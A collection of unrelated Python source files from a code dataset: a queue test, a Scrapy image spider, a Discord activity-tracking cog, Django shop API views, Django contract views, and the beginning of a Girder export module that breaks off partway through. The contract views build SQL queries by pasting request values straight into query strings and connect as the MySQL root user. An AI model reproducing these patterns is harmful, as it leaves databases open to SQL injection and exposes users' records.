+{"seq_id":"107723481","text":"import unittest\nfrom microservices.utils import set_logging\n\nset_logging()\n\n\nclass TestService(unittest.TestCase):\n def test_service(self):\n from microservices.queues.service import Microservice\n from microservices.queues.client import Client\n from kombu.connection import Connection\n\n microservice = Microservice('memory:///', timeout=1)\n\n connection = Connection('memory:///')\n\n @microservice.queue('test', connection=None)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n @microservice.queue('one_q', connection=connection)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n @microservice.queue('two_q', connection=connection)\n def handle_message(data, context):\n self.assertEqual(data, 'data')\n microservice.logger.info(data)\n\n client = Client('memory:///')\n test_q = client.queue('test')\n test_q.publish('data')\n\n queues = [\n ('one_q', 'one'),\n ('two_q', 'two'),\n ]\n client.declare_exchange('input', queues=queues)\n input_e_one = client.exchange('input', 'one')\n input_e_two = client.exchange('input', 'two')\n\n input_e_one.publish('data')\n input_e_two.publish('data')\n\n client.delete_queue('one_q')\n client.delete_exchange('input')\n client.purge_queue('two_q')\n\n microservice.read(count=5)\n","sub_path":"microservices/queues/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"237116564","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom ScrapyCrawler.items import Bmw3Item\n\n\nclass Bmw3Spider(CrawlSpider):\n name = 'bmw3'\n allowed_domains = ['car.autohome.com.cn']\n start_urls = ['https://car.autohome.com.cn/pic/series/65.html']\n\n # 为spider爬虫,配置自己的高清图片下载pipeline(ImagesPipeline)\n custom_settings = {\n \"ITEM_PIPELINES\": {\n 'ScrapyCrawler.pipelines.Bmw3Pipeline': 200,\n }\n }\n\n rules = (\n Rule(LinkExtractor(allow=r'https://car.autohome.com.cn/pic/series/65-.+'), callback='parse_page', follow=False),\n )\n\n def parse_page(self, response):\n # 图片的类别\n category = response.xpath('//div[@class=\"uibox\"]/div[@class=\"uibox-title\"]/text()').extract_first()\n # 分类图片地址列表(缩略图)\n src_urls = response.xpath(\n '//div[@class=\"uibox\"]/div[@class=\"uibox-con carpic-list03 border-b-solid\"]//img/@src').extract()\n # print(category,src_urls)\n # 把缩略图地址更换为高清图片地址\n src_urls = list(map(lambda x: x.replace(\"t_\", \"\"), src_urls))\n # 第一种方式: 给高清图片地址加上前缀: https://\n # image_urls = []\n # for src in src_urls:\n # url = response.urljoin(src)\n # image_urls.append(url)\n # 第二种方式: 给高清图片地址加上前缀: https://\n image_urls = list(map(lambda x: response.urljoin(x), src_urls))\n print(category, image_urls)\n # 推送数据到pipeline\n yield Bmw3Item(category=category, image_urls=image_urls)\n\n","sub_path":"04.ScrapyDoc/ScrapyCrawler/ScrapyCrawler/spiders/bmw3.py","file_name":"bmw3.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284824351","text":"import asyncio\nimport datetime\nimport json\nimport logging\nimport math\nimport os\nfrom discord.ext import commands\n\nPATH = \"data/activity/\"\nGLOBAL_NAME = \"activity.json\"\nMONTHLY_NAME = \"activity_monthly.json\"\nGLOBAL_PATH = PATH + GLOBAL_NAME\nMONTHLY_PATH = PATH + MONTHLY_NAME\n\n\nclass ActivityTracker:\n \"\"\"\n Tracks users activity by channel.\n\n It tracks word and messagecount per channel,\n directly associated with their discord ids.\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.people = {}\n self.people_monthly = {}\n self.normies = []\n self.logger = logging.getLogger(__name__)\n self.do_loops = True\n self.save_loop = self.bot.loop.create_task(self.looped_save_json())\n self.load_json()\n\n def __unload(self):\n self.save_json()\n self.save_loop.cancel()\n self.do_loops = False\n\n @commands.group()\n async def activity(self, ctx):\n \"\"\"Group for activity commands\"\"\"\n pass\n\n @activity.command()\n @commands.is_owner()\n async def save(self, ctx):\n \"\"\"Save the current data to the json file\"\"\"\n self.save_json()\n await ctx.send(\"Saved json.\")\n\n @activity.command()\n @commands.is_owner()\n async def reset(self, ctx):\n \"\"\"Reset the db and save the data to a backup file\"\"\"\n name = f\"{PATH}activity_monthly_{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}.json\"\n with open(name, \"w\") as fp:\n json.dump(self.people_monthly, fp, indent=4)\n self.people_monthly = {}\n self.save_json()\n return await ctx.send(f\"Successfully saved backup to `{name}` and reset all stats.\")\n\n @activity.command()\n @commands.is_owner()\n async def delete(self, ctx, discordid):\n \"\"\"\n Delete all saved tracking data about a user\n\n Parameters\n ----------\n discordid: int\n the discordid of the person you want to remove the stats from\n\n Example\n -------\n >>> !activity delete 278888022555230208\n Deletes all tracking data of the user with the discordid 278888022555230208\n \"\"\"\n if discordid in self.people:\n del(self.people[discordid])\n if discordid in self.people_monthly:\n del(self.people_monthly[discordid])\n self.save_json()\n await ctx.send(f\"Successfully deleted {discordid} from the db.\")\n else:\n await ctx.send(\"I don't have data of that user in my db.\")\n\n @activity.command(aliases=[\"lb\", \"sb\", \"scoreboard\"])\n async def leaderboard(self, ctx, globally=False, *blacklist):\n \"\"\"\n Show the top 10 most active people by wordcount\n\n Also display their total words/messages sent during the tracking period\n\n Parameters\n ----------\n globally: bool\n boolean value to determine whether you want to view global data or just\n a limited timeframe.\n accepts boolean-like strings like ('yes', 'no'), ('True', 'False') etc.\n\n blacklist: list\n space separated list of channel IDs of channels that you\n want to filter out from the total calculation\n\n Example\n -------\n >>> !activity leaderboard no 202424129700233217 222148922481573890\n Shows the top 10 people who sent the most words in all channels except\n those with the given IDs since the last stat reset.\n \"\"\"\n if globally:\n global_data = self.people\n else:\n global_data = self.people_monthly\n if not global_data:\n return await ctx.send(\"Nobody has been active during the specified timeframe yet.\")\n sorted_people = list(\n reversed(\n sorted(global_data.items(),\n key=lambda person: sum(person[1][channel][\"words\"] for channel in person[1] if channel not in blacklist))))\n maxlen = max(len(str(self.bot.get_user(int(discord_id)))) for discord_id, y in sorted_people)\n l = [(str(self.bot.get_user(int(discord_id))) + (\" \" * (maxlen - len(str(self.bot.get_user(int(discord_id)))))),\n f\"words: {sum(stats[channel]['words'] for channel in stats if channel not in blacklist)}\",\n f\"messages: {sum(stats[channel]['messages'] for channel in stats if channel not in blacklist)}\") for discord_id, stats in sorted_people]\n e = \"\\n\".join(\" \\t\".join(x) for x in l[:10])\n await ctx.send(f\"```{e}```\")\n\n @activity.command()\n async def me(self, ctx, globally=False, *blacklist):\n \"\"\"\n Show stats about your own discord activity\n\n Parameters\n ----------\n globally: bool\n boolean value to determine whether you want to view global data or just\n a limited timeframe.\n accepts boolean-like strings like ('yes', 'no'), ('True', 'False') etc.\n \n blacklist: list\n space separated list of channel IDs of channels that you\n want to filter out from the total calculation\n\n Example\n -------\n >>> !activity me yes 202424129700233217 222148922481573890\n Shows you stats about your all time activity, but filters out the two\n channels with the given IDs\n \"\"\"\n if globally:\n global_data = self.people\n else:\n global_data = self.people_monthly\n if str(ctx.author.id) not in global_data:\n return await ctx.send(\"You have no activity in the specified timeframe.\")\n sorted_stats = list(reversed(sorted(global_data[str(ctx.author.id)].items(),\n key=lambda channel: channel[1]['words'])))\n msg_sum = sum(stats['messages'] for channel, stats in sorted_stats if channel not in blacklist)\n word_sum = sum(stats['words'] for channel, stats in sorted_stats if channel not in blacklist)\n wpm = word_sum / msg_sum\n maxlen = max(len(self.bot.get_channel(int(channel)).name) for channel, stats in sorted_stats if channel not in blacklist)\n l = [(\"#\" + self.bot.get_channel(int(channel)).name + (\" \" * (maxlen - len(self.bot.get_channel(int(channel)).name))),\n f\"words: {str(stats['words'])}\",\n f\"messages: {str(stats['messages'])}\") for channel, stats in sorted_stats if channel not in blacklist]\n e = f\"**Total words:** {word_sum} **Total messages:** {msg_sum} **words/message:** {wpm:.2f}\\n```\" + \"\\n\".join(\" \\t\".join(x) for x in l) + \"```\"\n await ctx.send(e)\n\n async def on_message(self, message):\n ctx = await self.bot.get_context(message)\n if not message.content.startswith(\"!\") and \\\n not ctx.author.bot and \\\n ctx.guild and \\\n ctx.guild.id == 163292084214824960 and \\\n ctx.author.id not in self.normies:\n str_author = str(ctx.author.id)\n channel = str(ctx.channel.id)\n if str_author not in self.people:\n self.people[str_author] = {}\n if channel not in self.people[str_author]:\n self.people[str_author][channel] = {\"words\": 0, \"messages\": 0}\n if str_author not in self.people_monthly:\n self.people_monthly[str_author] = {}\n if channel not in self.people_monthly[str_author]:\n self.people_monthly[str_author][channel] = {\"words\": 0, \"messages\": 0}\n wordcount = len(message.content.strip(\" \").split(\" \"))\n if wordcount >= 15:\n avg_word_length = (len(message.content) - wordcount + 1) / wordcount\n if avg_word_length < 3:\n wordcount = round(math.log(wordcount))\n self.logger.warning(f\"{str(ctx.author)} tried to boost his wordcount danNo\")\n self.people[str_author][channel][\"messages\"] += 1\n self.people[str_author][channel][\"words\"] += wordcount\n self.people_monthly[str_author][channel][\"messages\"] += 1\n self.people_monthly[str_author][channel][\"words\"] += wordcount\n\n async def looped_save_json(self):\n while self.do_loops:\n await asyncio.sleep(120)\n self.save_json()\n\n def load_json(self):\n \"\"\"\n Reload the activity dictionary from the json file\n \"\"\"\n if not os.path.isdir(PATH):\n os.makedirs(PATH)\n self.logger.warning(f\"Couldn't find {PATH} directory, created new one.\")\n # global data\n if os.path.isfile(GLOBAL_PATH):\n with open(GLOBAL_PATH, \"r\") as fp:\n self.people = json.load(fp)\n else:\n with open(GLOBAL_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n self.logger.warning(f\"Couldn't find {GLOBAL_PATH}, created new one.\")\n # monthly data\n if os.path.isfile(MONTHLY_PATH):\n with open(MONTHLY_PATH, \"r\") as fp:\n self.people_monthly = json.load(fp)\n else:\n with open(MONTHLY_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n self.logger.warning(f\"Couldn't find {MONTHLY_PATH}, created new one.\")\n\n def save_json(self):\n \"\"\"\n Save the current state of the activity dictionary to the json file\n \"\"\"\n with open(GLOBAL_PATH, \"w\") as fp:\n json.dump(self.people, fp, indent=4)\n with open(MONTHLY_PATH, \"w\") as fp:\n json.dump(self.people_monthly, fp, indent=4)\n\n\ndef setup(bot):\n bot.add_cog(ActivityTracker(bot))\n","sub_path":"cogs/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":9626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"22053304","text":"import logging\nfrom rest_framework import generics, serializers, viewsets, mixins\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework import filters\nfrom api.models import Category, Product, Order, Review, Provider\nfrom api.serializers import CategorySerializer, ProductSerializer, OrderSerializer, ReviewSerializer, UserProfileSerializer, UserSerializer, ProviderSerializer\nfrom django.shortcuts import get_object_or_404\nfrom django.shortcuts import render\n\nlogger = logging.getLogger('api')\n\n@api_view(['GET', 'POST'])\ndef categories_view(request): #1 FBV\n if request.method == 'GET':\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n return Response(serializer.data, status=200)\n elif request.method == 'POST':\n serializer = CategorySerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=500)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef category_view(request, pk): #2 FBV\n category = get_object_or_404(Category, pk=pk)\n if request.method == 'GET':\n serializer = CategorySerializer(category)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = CategorySerializer(instance=category, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n elif request.method == 'DELETE':\n category.delete()\n return Response(status=204)\n\n\nclass CategoryViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Category.objects.all()\n serializer = CategorySerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Category.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = CategorySerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n category_data = request.data\n category = Category.objects.create(name=category_data['name'])\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category {serializer.instance} was created')\n logger.info(f'Category {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Category.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Category {instance} was deleted')\n logger.info(f'Category {instance} was deleted')\n except:\n logger.error(f'Category {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n category = Category.objects.get(id=pk)\n category.name = request.data['name']\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category {serializer.instance} was updated')\n logger.info(f'Category {serializer.instance} was updated')\n return Response(serializer.data)\n\n\nclass ProviderViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Provider.objects.all()\n serializer = ProviderSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Provider.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ProviderSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n provider_data = request.data\n provider = Provider.objects.create(name=provider_data['name'], description = provider_data['description'])\n provider.save()\n serializer = ProviderSerializer(provider)\n logger.debug(f'Provider {serializer.instance} was created')\n logger.info(f'Provider {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Provider.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Provider {instance} was deleted')\n logger.info(f'Provider {instance} was deleted')\n except:\n logger.error(f'Provider {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n provider = Provider.objects.get(id=pk)\n provider.name = request.data['name']\n provider.description = request.data['description']\n provider.save()\n serializer = ProviderSerializer(provider)\n logger.debug(f'Provider {serializer.instance} was updated')\n logger.info(f'Provider {serializer.instance} was updated')\n return Response(serializer.data)\n\n\n\nclass CategoryProductsView(APIView): #1 CBV\n filter_backends = (filters.OrderingFilter,)\n ordering = ('price', )\n\n def get(self, request, pk):\n category = get_object_or_404(Category, pk=pk)\n products = category.category_products.all()\n serializer = ProductSerializer(products, many=True)\n return Response(serializer.data)\n\nclass ProviderProductsView(APIView): #2 CBV\n def get(self, request, pk):\n provider = get_object_or_404(Provider, pk=pk)\n products = provider.provider_products.all()\n serializer = ProductSerializer(products, many=True)\n return Response(serializer.data)\n\nclass ProductViewSet(viewsets.ViewSet): #3 viewset\n #permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Product.objects.all()\n serializer = ProductSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Product.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ProductSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n product_data = request.data\n category = Category.objects.get(id = product_data['category'])\n provider = Provider.objects.get(id = product_data['provider'])\n product = Product.objects.create(name=product_data['name'], description = product_data['description'], category = category, provider = provider, image = product_data['image'], price = product_data['price'] )\n product.save()\n serializer = ProductSerializer(product)\n logger.debug(f'Product {serializer.instance} was created')\n logger.info(f'Product {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Product.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Product {instance} was deleted')\n logger.info(f'Product {instance} was deleted')\n except:\n logger.error(f'Product {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n product = Product.objects.get(id=pk)\n category = Category.objects.get(id = request.data['category'])\n provider = Provider.objects.get(id = request.data['provider'])\n\n product.name = request.data['name']\n product.description = request.data['description']\n product.price = request.data['price']\n product.provider = provider\n product.category = category\n product.image = request.data['image']\n product.save()\n serializer = ProductSerializer(product)\n logger.debug(f'Product {serializer.instance} was updated')\n logger.info(f'Product {serializer.instance} was updated')\n return Response(serializer.data)\n\n\n \nclass ProductView(APIView): #3 CBV\n def get(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n serializer = ProductSerializer(product)\n return Response(serializer.data)\n\n def put(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n serializer = ProductSerializer(instance=product, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.info(f'Product with ID {serializer.instance} was updated')\n logger.debug(f'Product with ID {serializer.instance} was updated')\n return Response(serializer.data)\n\n logger.error(f'Product with ID {serializer.instance} cannot be updated')\n return Response(serializer.errors, status=500)\n\n def delete(self, request, pk):\n product = get_object_or_404(Product, pk=pk)\n product.delete()\n return Response(status=204)\n\n\nclass ReviewViewSet(viewsets.ViewSet): #4 viewset\n permission_classes = (IsAuthenticated, )\n def list(self, request):\n queryset = Review.objects.all()\n serializer = ReviewSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Review.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ReviewSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n review_data = request.data\n review = Review.objects.create(text=review_data['text'], author = self.request.user)\n review.save()\n serializer = ReviewSerializer(review)\n logger.debug(f'Review {serializer.instance} was created')\n logger.info(f'Review {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Review.objects.for_user(self.request.user).get(id=pk)\n instance.delete()\n logger.debug(f'Review {instance} was deleted')\n logger.info(f'Review {instance} was deleted')\n except:\n logger.error(f'Review {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n review = Review.objects.for_user(self.request.user).get(id=pk)\n review.text = request.data['text']\n review.save()\n serializer = ReviewSerializer(review)\n logger.debug(f'Review {serializer.instance} was updated')\n logger.info(f'Review {serializer.instance} was updated')\n return Response(serializer.data)\n \nclass ReviewsView(generics.ListCreateAPIView): #4 CBV\n serializer_class = ReviewSerializer\n permission_classes = (IsAuthenticated, )\n\nclass OrdersView(generics.ListCreateAPIView): #5 CBV\n serializer_class = OrderSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n return Order.objects.for_user(self.request.user)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass OrderViewSet(viewsets.ViewSet): #5 viewset\n permission_classes = (IsAuthenticated, )\n def list(self, request):\n queryset = Order.objects.for_user(self.request.user)\n serializer = OrderSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Order.objects.for_user(self.request.user)\n user = get_object_or_404(queryset, pk=pk)\n serializer = OrderSerializer(user)\n return Response(serializer.data)\n\n def create(self, request):\n order_data = request.data\n order = Order.objects.create(product_name=order_data['product_name'], count = order_data['count'], user = self.request.user)\n order.save()\n serializer = OrderSerializer(order)\n logger.debug(f'Order {serializer.instance} was created')\n logger.info(f'Order {serializer.instance} was created')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Order.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Order {instance} was deleted')\n logger.info(f'Order {instance} was deleted')\n except:\n logger.error(f'Order {instance} cannot be deleted')\n return Response()\n\n def update(self, request, pk):\n order = Order.objects.get(id=pk)\n order.product_name = request.data['product_name']\n order.count = request.data['count']\n order.save()\n serializer = OrderSerializer(order)\n logger.debug(f'Order {serializer.instance} was updated')\n logger.info(f'Order {serializer.instance} was updated')\n return Response(serializer.data)\n\n","sub_path":"onlineshop_back/api/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"352268855","text":"import json\nimport logging\nimport pymysql\nfrom django.contrib import auth\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom inputDataHandler.inputDataHandler import InputDataHandler\nfrom script.count import LaunchScriptToCount\nfrom settings import PASSWORD, HOST_ADDRESS\n\n\n# Ajax на поиск договоров обращается сюда\n@require_POST\n@login_required\ndef search(request):\n contracts = None\n facial_id = request.POST.get('id')\n logging.info(\"Пользователь %s получает информацию о договорах для лицеового счета чей id = %s\",\n auth.get_user(request).username,\n facial_id)\n\n current_table = auth.get_user(request).userprofile.current_table\n\n if facial_id != \"\":\n search_for = \" AND ctf.facial_id = \" + facial_id\n\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n cur = connect.cursor()\n cur.execute(\"SELECT \"\n \"c.id, \"\n \"cc.number, \"\n \"DATE_FORMAT(c.registry_date, '%d.%m.%Y') AS registry_date, \"\n \"DATE_FORMAT(c.finish_date, '%d.%m.%Y') AS finish_date, \"\n \"c.living_amount, \"\n \"c.living_square, \"\n \"c.description \"\n \"FROM \" + current_table + \".contract_to_facial AS ctf \" +\n \"LEFT JOIN \" + current_table + \".contract AS c \" +\n \"ON ctf.contract_id = c.id \"\n \"LEFT JOIN \" + current_table + \".contract_capacity AS cc \" +\n \"ON cc.id = c.contract_capacity_id \"\n \"WHERE c.deleted_id = 0\" + search_for)\n contracts = cur.fetchall()\n cur.close()\n connect.close()\n\n contracts = {\"contracts\": contracts}\n print(contracts)\n\n return JsonResponse(contracts, safe=False)\n\n\n# Ajax на обнавелние договоров обращается сюда\n@require_POST\n@login_required\ndef update(request):\n data = json.loads(request.POST.get('data'))\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n for contract in data.get('events'):\n contract_id = contract.get('id')\n\n prefix = auth.get_user(request).userprofile.prefix\n current_table = auth.get_user(request).userprofile.current_table\n\n logging.info(\"Пользователь %s изменяет информацию о договоре чей id = %s\",\n auth.get_user(request).username,\n contract_id)\n\n data_handler = InputDataHandler()\n data_handler2 = InputDataHandler()\n\n if contract_id is not None:\n search_for = \" id=\" + str(contract_id)\n\n data_handler2.make_what_to_update_line_for_SQL(contract.get('number'), \"number\", False)\n\n data_handler.make_what_to_update_line_for_SQL(contract.get('reg-date'), \"registry_date\", True)\n data_handler.make_what_to_update_line_for_SQL(contract.get('fin-date'), \"finish_date\", True)\n data_handler.make_what_to_update_line_for_SQL(contract.get('square'), \"living_square\", False)\n data_handler.make_what_to_update_line_for_SQL(contract.get('amount'), \"living_amount\", False)\n data_handler.make_what_to_update_line_for_SQL(contract.get('notice'), \"description\", False)\n\n if data_handler.get_what_to_update() != \"\":\n cur = connect.cursor()\n cur.execute(\"UPDATE \"\n + current_table + \".contract \" +\n \"SET \"\n + data_handler.get_what_to_update() +\n \" WHERE\" + search_for)\n\n if data_handler2.get_what_to_update() != \"\":\n cur = connect.cursor()\n cur.execute(\"UPDATE \"\n + current_table + \".contract_capacity \" +\n \"SET \"\n + data_handler2.get_what_to_update() +\n \" WHERE\" + search_for)\n\n LaunchScriptToCount().count(prefix, current_table)\n\n cur.close()\n connect.close()\n\n return JsonResponse(\"{'status':'ok'}\", safe=False)\n\n\n# Ajax на добавление договоров обращается сюда\n@require_POST\n@login_required\ndef add(request):\n data = json.loads(request.POST.get('data'))\n\n current_table = auth.get_user(request).userprofile.current_table\n\n connect = pymysql.connect(host=HOST_ADDRESS, user='root', password=PASSWORD, charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n cur = connect.cursor()\n\n number = data.get('number')\n\n if number is not None:\n cur.execute(\"SELECT \"\n \"id \"\n \"FROM contract_capacity \"\n \"WHERE busy = 1 AND number =\" + number)\n number_is_exist = cur.fetchone()['id']\n if number_is_exist is not None:\n return JsonResponse(\"{'status': 'already exist'}\", safe=False)\n\n logging.info(\"Пользователь %s добовляет договор чей номер = %s\",\n auth.get_user(request).username,\n number)\n\n data_handler = InputDataHandler()\n\n data_handler.make_what_to_insert_line_for_SQL(number, False)\n data_handler.make_what_to_insert_line_for_SQL(\"1\", False)\n\n data_handler.make_insert_into(number, 'number')\n data_handler.make_insert_into(\"1\", 'busy')\n\n cur.execute(\"INSERT INTO \"\n + current_table + \".contract_capacity \" +\n \"( \"\n + data_handler.get_insert_into() +\n \") \"\n \"VALUES \"\n \"( \"\n + data_handler.get_what_to_insert() +\n \")\")\n\n cur.execute(\"SELECT LAST_INSERT_ID() AS id\")\n contract_capacity_id = cur.fetchone()['id']\n print(contract_capacity_id)\n\n data_handler2 = InputDataHandler()\n\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(contract_capacity_id, False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('registry-date'), True)\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('tariff-scheme-id'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('finish-date'), True)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('nds-rate'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('fine-rate'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('over-draft'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('text'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('template-id'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('living-amount'), False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('living-square'), False)\n data_handler2.make_what_to_insert_line_for_SQL(\"0\", False)\n data_handler2.make_what_to_insert_line_for_SQL(data.get('description'), False)\n data_handler2.make_what_to_insert_line_for_SQL(\"now()\", False)\n\n data_handler2.make_insert_into(\"0\", 'deleted_id')\n data_handler2.make_insert_into(contract_capacity_id, 'contract_capacity_id')\n data_handler2.make_insert_into(data.get('registry-date'), 'registry_date')\n data_handler2.make_insert_into(\"0\", 'registry-operator')\n data_handler2.make_insert_into(data.get('tariff-scheme-id'), 'tariff_scheme_id')\n data_handler2.make_insert_into(data.get('finish-date'), 'finish_date')\n data_handler2.make_insert_into(data.get('nds-rate'), 'nds_rate')\n data_handler2.make_insert_into(data.get('fine-rate'), 'fine_rate')\n data_handler2.make_insert_into(data.get('over-draft'), 'over_draft')\n data_handler2.make_insert_into(data.get('text'), 'text')\n data_handler2.make_insert_into(data.get('template-id'), 'template_id')\n data_handler2.make_insert_into(data.get('living-amount'), 'living-amount')\n data_handler2.make_insert_into(data.get('living-square'), 'living-square')\n data_handler2.make_insert_into(\"0\", 'access-group-id')\n data_handler2.make_insert_into(data.get('description'), 'description')\n data_handler2.make_insert_into(\"now()\", 'create_date')\n\n cur.execute(\"INSERT INTO \"\n + current_table + \".contract \" +\n \"( \"\n + data_handler2.get_insert_into() +\n \") \"\n \"VALUES \"\n \"( \"\n + data_handler2.get_what_to_insert() +\n \")\")\n\n cur.close()\n connect.close()\n\n return JsonResponse(\"{'status': 'ok'}\", safe=False)\n","sub_path":"contract/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"414168517","text":"def split_orders(orders_data, working_hours):\n av_orders = []\n un_orders = []\n for order in orders_data:\n find = False\n for st2, fn2 in order['delivery_hours']:\n for st1, fn1 in working_hours:\n if st2 <= st1 and fn1 <= fn2:\n av_orders.append(order)\n find = True\n break\n if find:\n break\n if not find:\n un_orders.append(order['_id'])\n return av_orders, un_orders\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528527171","text":"from hashlib import sha256, md5\nimport json\nimport magic\nimport os\nimport requests\nfrom girder.utility import hash_state, ziputil, JsonEncoder\nfrom girder.models.folder import Folder\nfrom girder.constants import AccessType\nfrom ..license import WholeTaleLicense\n\n\nclass HashFileStream:\n \"\"\"Generator that computes md5 and sha256 of data returned by it\"\"\"\n\n def __init__(self, gen):\n \"\"\"\n This class is primarily meant to wrap Girder's download function,\n which returns iterators, hence self.x = x()\n \"\"\"\n try:\n self.gen = gen()\n except TypeError:\n self.gen = gen\n self.state = {\n 'md5': hash_state.serializeHex(md5()),\n 'sha256': hash_state.serializeHex(sha256()),\n }\n\n def __iter__(self):\n return self\n\n def __next__(self):\n nxt = next(self.gen)\n for alg in self.state.keys():\n checksum = hash_state.restoreHex(self.state[alg], alg)\n checksum.update(nxt)\n self.state[alg] = hash_state.serializeHex(checksum)\n return nxt\n\n def __call__(self):\n \"\"\"Needs to be callable, see comment in __init__\"\"\"\n return self\n\n @property\n def sha256(self):\n return hash_state.restoreHex(self.state['sha256'], 'sha256').hexdigest()\n\n @property\n def md5(self):\n return hash_state.restoreHex(self.state['md5'], 'md5').hexdigest()\n\n\nclass TaleExporter:\n default_top_readme = \"\"\"This zip file contains the code, data, and information about a Tale.\n\n Directory Structure:\n metadata/: Holds information about the runtime environment and Tale attributes\n workspace/: Contains the files and folders that were used in the Tale\n LICENSE: The license that the code and data falls under\n README.md: This file\"\"\"\n default_bagit = \"BagIt-Version: 0.97\\nTag-File-Character-Encoding: UTF-8\\n\"\n\n def __init__(self, user, manifest, environment, algs=None):\n self.user = user\n self.manifest = manifest\n self.environment = environment\n\n if algs is None:\n self.algs = [\"md5\", \"sha1\", \"sha256\"]\n\n zipname = os.path.basename(manifest[\"dct:hasVersion\"][\"@id\"])\n self.zip_generator = ziputil.ZipGenerator(zipname)\n license_spdx = next(\n (\n agg[\"schema:license\"]\n for agg in manifest[\"aggregates\"]\n if \"schema:license\" in agg\n ),\n 